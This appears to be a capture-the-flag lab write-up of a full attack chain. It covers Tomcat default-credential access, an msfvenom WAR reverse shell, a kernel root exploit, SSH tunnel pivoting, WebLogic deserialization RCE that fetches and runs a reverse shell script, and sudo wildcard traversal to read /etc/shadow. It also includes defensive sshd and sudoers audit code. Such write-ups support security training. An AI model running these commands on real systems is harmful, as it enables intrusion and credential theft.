Lab:
Reconnaissance
Let’s start the fun by doing an nmap scan on our Victim machine 192.168.1.8
We found multiple services running, including Apache, NetBIOS, an NFS share and Tomcat. Whenever I find Tomcat, I always think of the Tomcat default credentials and the WAR file upload exploit.
Exploit Scenario
First I visited http://192.168.1.8:8080/manager, tried the tomcat:tomcat credentials, and could log in to the manager interface.
Next I created a WAR payload with msfvenom that, once deployed on the server, opens a reverse shell to my attacker machine 192.168.1.13 on port 4443, and named the file webshell.war:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.13 LPORT=4443 -f war > webshell.war
Next we need the name of the JSP file inside the archive so we can request it; jar -tf webshell.war lists it.
Next we start a listener on port 4443 and then trigger the JSP with
wget 192.168.1.8:8080/webshell/umrvzbycqupfmbi.jsp
or by visiting the URL in the browser, and we get a shell on our first victim as user tomcat7.
Privilege Escalation
Once I get a shell and want to escalate privileges, I always check which commands I can run as root through sudo.
Unfortunately I can't run any commands with sudo, so let's check the kernel version with uname -v.
Some Google-fu shows that this version is vulnerable to a privilege escalation exploit, so we can get the exploit 39166.c from the internet.
First I have to get the exploit code onto the victim machine, so I started a Python HTTP server with python -m SimpleHTTPServer, which listens on port 8000, and then ran wget from the reverse shell to fetch the code and place it in /tmp.
Finally we compile the code, run the exploit, and voilà, we have a root shell.
Pivoting
First let's run ifconfig to check whether our victim is connected to another network.
We can see that it has another IP, 192.168.152.143. Now we have to find a way to use this machine as a pivot into the other network; from an article on how Hacking got hacked, I remembered a technique for this using SSH dynamic tunneling and proxychains.
So first I started the SSH daemon, since the nmap results showed no SSH running, and I also changed the root password so that I could establish an SSH session.
Next I ran the command below, which creates what is called a dynamic tunnel using the -D option:
ssh -D 9090 root@192.168.1.8
Once the SSH session is established, the tunnel is up on port 9090, so next let's configure proxychains to use this port,
and then we can prefix any command with proxychains when connecting to any IP in the 192.168.152.0/24 subnet.
Next we can run our nmap sweep through proxychains, which will route it over the SSH tunnel on port 9090 to reach the 192.168.152.0/24 subnet, by executing sudo proxychains nmap -Pn 192.168.152.0/24
Excluding 192.168.152.1 and 192.167.152.254 (VM-specific IPs), we can conclude that our next victim is 192.168.152.141.
Let's nmap this host through proxychains.
We found two open ports. First I wanted to browse to port 7001 from my browser, but unfortunately proxychains couldn't do that, so the solution was a local SSH tunnel to reach port 7001: running ssh -L 7000:192.168.152.141:7001 root@192.168.1.8 means we can connect to localhost port 7000 and the traffic is tunneled to our victim 192.168.152.141 on port 7001.
Next, from the browser we can visit http://localhost:7000 and find that it is Oracle WebLogic.
WebLogic is Oracle application middleware that is usually used to connect applications with each other using servlets and other techniques.
Some Google-fu shows that it is vulnerable to a Java deserialization exploit that can lead to RCE.
I found many write-ups on how to exploit Java deserialization vulnerabilities in Oracle WebLogic, including this one.
The only challenge was how to get a reverse shell from the other victim, 192.168.152.141, while it is not on our network.
Again we can use SSH tunneling, but this time remote SSH tunneling.
We need a remote tunnel that will be used to connect back to our Linux Mint attacker machine 192.168.1.13 on port 4444.
So first we created our bash reverse shell script; the script below, when executed, makes a reverse shell connection to our first victim 192.168.152.143 on port 8888.
So we have to create a remote tunnel that forwards every connection to port 8888 on the first victim to port 4444 on our machine:
ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8
Once the SSH connection between the attacker machine and the first victim is established, this command creates a listener on the first victim on port 8888; any connection to this port is forwarded to the attacker machine on port 4444.
But now, how can we get this bash script to the vulnerable WebLogic server? The solution is to host it on our Python SimpleHTTPServer on port 8000 and create another remote tunnel to my web server using
ssh -R 0.0.0.0:8001:192.168.1.13:8000 root@192.168.1.8
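A defender-side check for the server settings these tunnels depend on, added here as an example and not part of the original write-up: the ssh -D and -L forwards need AllowTcpForwarding on the pivot host, and a -R forward bound to 0.0.0.0 only listens on all interfaces when GatewayPorts permits it, otherwise sshd binds it to loopback. The functions below evaluate a constructed sshd_config fragment against OpenSSH's upstream defaults; Match blocks are assumed away.

```python
"""Audit an sshd_config for the directives the pivot above depends on.

Added example, not part of the original write-up. Models three OpenSSH directives
with their upstream defaults (Match blocks are not modelled):
  AllowTcpForwarding (default yes)  gates the -D, -L and -R forwards used above
  GatewayPorts       (default no)   whether a -R forward may bind 0.0.0.0 instead of loopback
  PermitRootLogin    (default prohibit-password)  whether root@ may log in with a password
"""
import re

DEFAULTS = {
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
    "permitrootlogin": "prohibit-password",
}

def parse_sshd_config(text):
    """Return the effective value of each directive (sshd keeps the FIRST one it sees)."""
    effective = dict(DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = re.split(r"[\s=]+", line, maxsplit=1) if line else []
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if key in DEFAULTS and key not in seen:
            effective[key] = value
            seen.add(key)
    return effective

def audit_sshd_config(text):
    """Map each tunnel type from the write-up to whether this server config permits it."""
    cfg = parse_sshd_config(text)
    fwd = cfg["allowtcpforwarding"]
    remote_ok = fwd in ("yes", "remote")
    return {
        "dynamic_or_local_forward": fwd in ("yes", "local"),  # ssh -D 9090 / ssh -L 7000:...
        "remote_forward": remote_ok,  # ssh -R
        "remote_forward_bind_all": remote_ok  # ssh -R 0.0.0.0:8888:...
        and cfg["gatewayports"] in ("yes", "clientspecified"),
        "root_password_login": cfg["permitrootlogin"] == "yes",  # root@pivot with a password
    }

# Constructed: a pivot host that permits every step in the tunneling section.
WEAK_CONFIG = "PermitRootLogin yes\nAllowTcpForwarding yes\nGatewayPorts yes\n"
# Constructed: the same host hardened so it cannot relay traffic or accept root logins.
HARDENED_CONFIG = "PermitRootLogin no\nAllowTcpForwarding no\nGatewayPorts no\n"
```

Note that the upstream default already blocks the 0.0.0.0 bind, so a -R listener reachable from the second subnet implies GatewayPorts was changed on the pivot host.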
So let's now exploit the WebLogic Java deserialization vulnerability.
Let's use the exploit code from this blog:
python weblogic.py [victim host and port] [path to the ysoserial tool, which generates Java payloads] [command to execute]
python weblogic.py localhost 7000 ../ysoserial-0.0.2-all.jar 'wget http://192.168.152.143:8001/BashReverseShell.sh'
Connecting to 192.168.152.143:8001 therefore reaches our machine on port 8000, where the Python HTTP web server is running,
and in the Python web server logs we can see a GET request for the bash file, which means our exploit is working; the only thing left is to execute the script.
So now let's run the exploit code, which will make a reverse connection to 192.168.152.141:8888, tunneled to 192.168.1.13:4444 by the command
ssh -R 0.0.0.0:8888:192.168.1.13:4444 root@192.168.1.8
and we also have to start our listener on port 4444.
Finally, when we execute python weblogic.py localhost 7000 ../ysoserial-0.0.2-all.jar 'sh BashReverseShell.sh' we get ourselves a shell.
Misconfiguration to root
As always, when I get a shell I try to find which commands I can run as root using sudo.
I find that I can run /bin/cat /root/backup/*
Great, that is a misconfiguration we can take advantage of: the wildcard lets us sudo cat a path under /root/backup, go two directories back, and basically cat any file we want as root.
So let's cat the shadow file using
sudo /bin/cat /root/backup/../../etc/shadow
and finally I cracked the root password using John the Ripper; it was mario101.
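As an added example (not from the original post), the check below shows why the sudoers rule above is exploitable and how to audit a sudoers file for the same pattern: sudo compares the arguments with fnmatch, where * also matches /, so /root/backup/* accepts /root/backup/../../etc/shadow. The user name and backup file names in the sample fragment are constructed.

```python
"""Why a sudoers rule of "/bin/cat /root/backup/*" is a misconfiguration, and how to spot it.

Added example, not from the original write-up. sudo matches the requested arguments
against the rule's argument glob with fnmatch(3) semantics, where "*" also matches "/",
so a trailing "/*" accepts "../" components that resolve outside the intended directory.
"""
import fnmatch
import posixpath
import re

def sudo_rule_matches(rule, command):
    """Simplified sudoers matching: same program, and the arguments satisfy the glob."""
    rule_prog, _, rule_args = rule.partition(" ")
    cmd_prog, _, cmd_args = command.partition(" ")
    return rule_prog == cmd_prog and fnmatch.fnmatchcase(cmd_args, rule_args)

def escapes_directory(rule):
    """True when the rule's glob accepts a path that resolves outside its own directory."""
    prog, _, args = rule.partition(" ")
    if not args.endswith("/*"):
        return False
    base = args[:-2]
    traversal = base + "/../../etc/shadow"  # constructed probe mirroring the lab
    resolved = posixpath.normpath(traversal)
    return sudo_rule_matches(rule, prog + " " + traversal) and not resolved.startswith(base + "/")

def audit_sudoers(text):
    """Return the command rules in a sudoers fragment whose wildcard allows traversal."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"^\S+\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?:NOPASSWD:\s*)?(.+)$", line)
        if not m:
            continue
        for rule in m.group(1).split(","):
            rule = rule.strip()
            if escapes_directory(rule):
                findings.append(rule)
    return findings

# Constructed fragment: the lab's rule beside a safer way to grant the same need.
SAMPLE_SUDOERS = """
# weak: "*" matches "/", so ../ walks out of /root/backup
weblogic ALL=(root) /bin/cat /root/backup/*
# safer: name the files explicitly instead of using a wildcard
weblogic ALL=(root) /bin/cat /root/backup/db.tar.gz, /bin/cat /root/backup/www.tar.gz
"""
```

The same matcher also shows why the slash matters: /root/backup../../etc/shadow does not satisfy /root/backup/* at all, which is the check to keep in mind when reviewing wildcard rules.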
Thanks, hope you enjoyed reading.